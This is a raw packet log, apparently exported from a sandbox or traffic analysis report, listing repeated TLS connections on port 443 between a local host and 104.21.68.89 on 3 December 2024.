                                                                                                                                                                              Dec 3, 2024 17:45:43.255269051 CET49972443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:43.255286932 CET44349972104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:43.309149981 CET49979443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:43.309206963 CET44349979104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:43.309384108 CET49979443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:43.313066006 CET49979443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:43.313087940 CET44349979104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:44.593058109 CET44349979104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:44.594985008 CET49979443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:44.621742964 CET49979443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:44.621769905 CET44349979104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:44.622656107 CET49979443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:44.622664928 CET44349979104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:45.985508919 CET44349979104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:45.985574007 CET49979443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:45.985608101 CET44349979104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:45.985634089 CET44349979104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:45.985650063 CET49979443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:45.985690117 CET49979443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:45.986041069 CET49979443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:45.986057997 CET44349979104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:46.179133892 CET49986443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:46.179183960 CET44349986104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:46.179246902 CET49986443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:46.179603100 CET49986443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:46.179619074 CET44349986104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:47.402417898 CET44349986104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:47.402473927 CET49986443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:47.403347015 CET49986443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:47.403353930 CET44349986104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:47.403656960 CET49986443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:47.403661966 CET44349986104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:48.998533010 CET44349986104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:48.998631001 CET49986443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:48.998663902 CET44349986104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:48.998682976 CET44349986104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:48.998733044 CET49986443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:48.998733044 CET49986443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:48.998986959 CET49986443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:48.999003887 CET44349986104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:49.105587006 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:49.105631113 CET44349994104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:49.105741024 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:49.106095076 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:49.106108904 CET44349994104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:50.363351107 CET44349994104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:50.363398075 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:50.367139101 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:50.367146969 CET44349994104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:50.367383957 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:50.367388964 CET44349994104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:51.982748985 CET44349994104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:51.982795954 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:51.982815027 CET44349994104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:51.982847929 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:51.982852936 CET44349994104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:51.982892990 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:51.982893944 CET44349994104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:51.982937098 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:51.983220100 CET49994443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:51.983236074 CET44349994104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:52.062092066 CET50002443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:52.062160015 CET44350002104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:52.062232018 CET50002443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:52.062647104 CET50002443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:52.062661886 CET44350002104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:53.381993055 CET44350002104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:53.382246017 CET50002443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:53.382922888 CET50002443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:53.382929087 CET44350002104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:53.382966042 CET50002443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:53.382971048 CET44350002104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:55.005115032 CET44350002104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:55.005215883 CET44350002104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:55.005213976 CET50002443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:55.005424023 CET50002443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:55.005522966 CET50002443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:55.005537033 CET44350002104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:55.139048100 CET50008443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:55.139098883 CET44350008104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:55.139210939 CET50008443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:55.139708042 CET50008443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:55.139719963 CET44350008104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:56.463088989 CET44350008104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:56.463151932 CET50008443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:56.463872910 CET50008443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:56.463886023 CET44350008104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:56.463990927 CET50008443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:56.463995934 CET44350008104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:57.857805967 CET44350008104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:57.857867956 CET50008443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:57.857909918 CET44350008104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:57.857986927 CET50008443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:57.857995987 CET44350008104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:57.858136892 CET50008443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:57.858416080 CET50008443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:57.858436108 CET44350008104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:57.940390110 CET50016443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:57.940449953 CET44350016104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:57.940511942 CET50016443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:57.940808058 CET50016443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:57.940825939 CET44350016104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:59.272841930 CET44350016104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:59.272932053 CET50016443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:59.273452997 CET50016443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:59.273459911 CET44350016104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:59.273730040 CET50016443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:59.273735046 CET44350016104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:00.923681021 CET44350016104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:00.923782110 CET44350016104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:00.927993059 CET50016443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:00.927993059 CET50016443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:01.022924900 CET50025443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:01.022989988 CET44350025104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:01.023082018 CET50025443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:01.026921034 CET50025443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:01.026936054 CET44350025104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:01.326920986 CET50016443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:01.326972008 CET44350016104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:02.293571949 CET44350025104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:02.293632984 CET50025443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:02.294238091 CET50025443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:02.294250965 CET44350025104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:02.294523001 CET50025443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:02.294528961 CET44350025104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:03.910917997 CET44350025104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:03.911030054 CET44350025104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:03.911082983 CET50025443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:03.911123991 CET50025443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:03.911427975 CET50025443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:03.911449909 CET44350025104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:04.460019112 CET50029443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:04.460071087 CET44350029104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:04.460143089 CET50029443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:04.460417032 CET50029443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:04.460441113 CET44350029104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:05.673113108 CET44350029104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:05.673224926 CET50029443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:05.673729897 CET50029443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:05.673738003 CET44350029104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:05.673984051 CET50029443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:05.673989058 CET44350029104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:07.271734953 CET44350029104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:07.271809101 CET50029443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:07.271826982 CET44350029104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:07.271840096 CET44350029104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:07.271871090 CET50029443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:07.271898031 CET50029443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:07.272126913 CET50029443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:07.272141933 CET44350029104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:07.396593094 CET50030443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:07.396640062 CET44350030104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:07.396703959 CET50030443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:07.397061110 CET50030443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:07.397074938 CET44350030104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:08.703943014 CET44350030104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:08.704029083 CET50030443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:08.712115049 CET50030443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:08.712130070 CET44350030104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:08.712536097 CET50030443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:08.712543011 CET44350030104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:10.384301901 CET44350030104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:10.384399891 CET44350030104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:10.384480953 CET50030443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:10.384481907 CET50030443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:10.386919022 CET50030443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:10.386940002 CET44350030104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:10.433574915 CET50031443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:10.433618069 CET44350031104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:10.433682919 CET50031443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:10.434191942 CET50031443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:10.434204102 CET44350031104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:11.737425089 CET44350031104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:11.743479013 CET50031443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:11.743479013 CET50031443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:11.743510008 CET44350031104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:11.744924068 CET50031443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:11.744929075 CET44350031104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:13.177192926 CET44350031104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:13.177262068 CET50031443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:13.177301884 CET44350031104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:13.177316904 CET44350031104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:13.177344084 CET50031443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:13.177362919 CET50031443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:13.177743912 CET50031443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:13.177762985 CET44350031104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:13.277234077 CET50032443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:13.277288914 CET44350032104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:13.277354956 CET50032443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:13.277800083 CET50032443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:13.277813911 CET44350032104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:14.546226025 CET44350032104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:14.546289921 CET50032443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:14.547143936 CET50032443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:14.547157049 CET44350032104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:14.547511101 CET50032443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:14.547517061 CET44350032104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:15.951153040 CET44350032104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:15.951494932 CET44350032104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:15.955024958 CET50032443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:15.958913088 CET50032443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:15.958936930 CET44350032104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:16.013751984 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:16.013818026 CET44350033104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:16.015055895 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:16.018918037 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:16.018934011 CET44350033104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:17.305671930 CET44350033104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:17.305730104 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:17.306206942 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:17.306217909 CET44350033104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:17.306487083 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:17.306493044 CET44350033104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:18.925230026 CET44350033104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:18.925307035 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:18.925343990 CET44350033104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:18.925385952 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:18.925391912 CET44350033104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:18.925406933 CET44350033104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:18.925427914 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:18.925446987 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:18.925930977 CET50033443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:18.925952911 CET44350033104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:19.562928915 CET50034443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:19.563000917 CET44350034104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:19.563221931 CET50034443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:19.563750029 CET50034443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:19.563766003 CET44350034104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:20.824553967 CET44350034104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:20.824721098 CET50034443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:20.825254917 CET50034443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:20.825269938 CET44350034104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:20.825535059 CET50034443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:20.825541973 CET44350034104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:22.430237055 CET44350034104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:22.430341005 CET44350034104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:22.430375099 CET50034443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:22.430713892 CET50034443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:22.430830002 CET50034443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:22.430859089 CET44350034104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:22.507616997 CET50035443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:22.507694960 CET44350035104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:22.507759094 CET50035443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:22.508172035 CET50035443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:22.508191109 CET44350035104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:23.773441076 CET44350035104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:23.775019884 CET50035443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:23.775654078 CET50035443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:23.775654078 CET50035443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:23.775665998 CET44350035104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:23.775681019 CET44350035104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:25.189990997 CET44350035104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:25.190059900 CET50035443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:25.190102100 CET44350035104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:25.190108061 CET44350035104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:25.190152884 CET50035443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:25.190172911 CET50035443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:25.190476894 CET50035443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:25.190495014 CET44350035104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:25.299477100 CET50036443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:25.299514055 CET44350036104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:25.299576044 CET50036443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:25.299951077 CET50036443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:25.299964905 CET44350036104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:26.531645060 CET44350036104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:26.531713009 CET50036443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:26.532464027 CET50036443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:26.532471895 CET44350036104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:26.532879114 CET50036443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:26.532882929 CET44350036104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:28.179030895 CET44350036104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:28.179132938 CET50036443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:28.179137945 CET44350036104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:28.179231882 CET50036443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:28.179723024 CET50036443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:28.179740906 CET44350036104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:28.297790051 CET50037443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:28.297852039 CET44350037104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:28.298201084 CET50037443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:28.298532009 CET50037443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:28.298564911 CET44350037104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:29.570341110 CET44350037104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:29.573064089 CET50037443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:29.573563099 CET50037443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:29.573584080 CET44350037104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:29.577805042 CET50037443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:29.577828884 CET44350037104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:31.178282976 CET44350037104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:31.178359985 CET50037443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:31.178390980 CET44350037104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:31.178405046 CET44350037104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:46:31.178448915 CET50037443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:31.178736925 CET50037443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:46:31.178755045 CET44350037104.21.68.89192.168.2.4
